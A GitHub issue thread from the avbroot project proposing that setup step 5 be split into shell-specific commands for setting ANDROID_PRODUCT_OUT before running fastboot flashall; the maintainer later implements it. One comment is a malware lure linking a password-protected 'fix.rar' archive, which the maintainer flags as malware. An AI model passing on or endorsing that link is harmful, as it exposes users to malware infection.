### ISSUE TITLE
Initial Setup step #5 typo?

### ISSUE THREAD

**Issue by e-t-l** [chenxiaolong/avbroot#340]
Sorry for all the edits, I was having trouble executing Step #5 until I realized I needed to confirm unlocking the bootloader on the physical device before proceeding with flashing. Anyway...

Step 5 of https://github.com/chenxiaolong/avbroot?tab=readme-ov-file#initial-setup is:
`ANDROID_PRODUCT_OUT=extracted fastboot flashall --skip-reboot`

I think this might be the command for bash, and maybe in bash it works when you type it all on one line, but it fails and causes confusion in other shells (#303's user was using Powershell, I'm using CMD, etc). In other shells, the two commands must be executed separately.

It would be good to split it into two steps:
1. Bash: `ANDROID_PRODUCT_OUT=extracted`
Cmd: `set ANDROID_PRODUCT_OUT=extracted`
Powershell: `$env:ANDROID_PRODUCT_OUT = "extracted"`
**
(and maybe explicitly state that the goal of this step is to create a local environmental variable named `ANDROID_PRODUCT_OUT` with the string value `extracted`)

2. `fastboot flashall --skip-reboot`

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenxiaolong** [comment]
(This is for the folks with email notifications for all issues in the project.)

There was a comment with containing a link to malware on `mediafire.com`. It is completely unrelated to @e-t-l's original post. Do not click the link or download the file. Github has already deleted the user and banned the account.

**Comment by chenxiaolong** [comment]
Thanks! This is a good idea, but may no longer be necessary soon due to an upcoming feature that will remove the need for the environment variable (due to switching to `fastboot update`). I'll leave this issue open until that's in place.

**Comment by chenxiaolong** [comment]
The thing I wanted to add didn't work out, so I've implemented your suggestion in 8ca1a289a8111da76ac0cc25ec64fdb2b051f643
